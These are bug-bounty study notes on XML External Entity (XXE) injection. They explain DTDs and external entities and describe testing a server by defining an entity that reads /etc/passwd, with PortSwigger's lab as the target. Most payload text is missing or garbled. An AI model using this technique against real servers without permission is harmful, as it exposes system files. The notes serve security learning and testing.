# XXE
## Basics of XML
Extensible Markup Language (XML) is a language designed to store and transport data similar to JSON.
The basic structure of XML
If you ever see this line in burp you should test for XXE:
* \
Document Type Definition (DTD) defines the structure and the legal elements and attributes of an XML document:
* Here an ENTITY acts as a variable called “user” and holds the text “Ghostlulz”.
Document Type Definition
Note that an external entity loads its data from an external source, for example:
* \\]>](https://yasmeen-rezk.gitbook.io/my-notes/bug-bounty-playbook-1/section-3-exploitation-phase/chapter-11-exploitation-owasp/http:/example.com">]>)
* \]>
## XXE
Whenever you see XML you should test for XXE.
In order to read the data the entity must be returned in the response, So:
* if we can use external entities to grab data from a file on disk and store it in a variable, we can try to read data from the “/etc/passwd” file and store it in a variable.
#### Testing for XXE
1. put in your malicious external entity and replace each node value with it, like:
* Here we created an external entity to grab the data in the “/etc/passwd” file and stored it in the entity XXE then placed the variable in the "\" node.
XXE payload
2. If the server doesn’t block external entities the response will be reflected to you, like:
Use XXE to read /etc/passwd file
The vulnerable application used can be found at [**https://portswigger.net/web-security**](https://portswigger.net/web-security)
